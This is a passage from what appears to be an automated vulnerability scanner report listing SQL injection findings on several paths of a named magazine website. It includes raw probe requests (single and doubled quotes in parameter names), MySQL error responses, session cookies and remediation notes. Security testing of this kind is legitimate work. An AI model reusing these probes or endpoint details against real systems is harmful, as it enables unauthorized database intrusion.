GET /boat-shop/know-how?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop/know-how?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.48. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/new-boats
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /boat-shop/new-boats?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop/new-boats?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.49. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/new-gear
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /boat-shop/new-gear?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop/new-gear?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.50. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/on-powerboats
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /boat-shop/on-powerboats?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop/on-powerboats?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.51. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/on-sailboats
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /boat-shop/on-sailboats?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop/on-sailboats?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.52. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/q-a-a
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /boat-shop/q-a-a?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:18 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop/q-a-a?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.53. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/sea-savvy
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /boat-shop/sea-savvy?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop/sea-savvy?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.54. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/tech-talk
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /boat-shop/tech-talk?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop/tech-talk?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.55. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/used-boat-review
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /boat-shop/used-boat-review?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop/used-boat-review?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.56. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/calendar
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /calendar?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
